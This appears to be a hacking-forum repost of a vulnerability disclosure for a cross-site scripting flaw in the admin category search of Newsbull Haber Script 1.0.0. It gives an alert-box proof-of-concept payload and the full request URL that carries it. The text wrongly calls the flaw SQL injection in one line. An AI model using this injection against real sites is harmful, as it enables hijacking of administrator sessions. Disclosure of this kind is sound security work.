Newsbull Haber Script XSS Vuln.
by Adient - May 30, 2019 at 10:55 PM
#1
####################################################################


# Exploit Title: Newsbull Haber Script - XSS Vulnerabilities
# Dork: N/A
# Date: 28-01-2019
# Exploit Author: Vicroity 
# Vendor Homepage: http://newsbull.org/
# Software Link: https://github.com/gurkanuzunca/newsbull
# Version: 1.0.0
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A

####################################################################

# Vulnerabilities
# For the SQL injection to be applied, the user must log in.
# You can see the vulnerability by using the XSS code as specified in the poc section.
# The proof of the deficit is in the link below.
# https://i.hizliresim.com/4jaYlq.jpg
# https://i.hizliresim.com/mM2qLZ.jpg

####################################################################

# POC - XSS
# Parameters : search
# Attack Pattern : ‘"-- gt; lt;/style gt; lt;/Script gt; lt;Script gt;alert(0x007454) lt;/Script gt;
# GET Request : http://localhost/newsbull/admin/category/records?search=‘"-- gt; lt;/style gt; lt;/Script gt; lt;Script gt;alert(0x007454) lt;/Script gt; 

####################################################################
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Stimarine Xss vuln Adient 0 86 August 26, 2019 at 09:01 PM
Last Post: Adient
ultimate loan manager - xss Adient 0 90 August 25, 2019 at 09:39 PM
Last Post: Adient
vBulletin XSS via Adient 0 96 August 25, 2019 at 09:33 PM
Last Post: Adient

 Users browsing this thread: 1 Guest(s)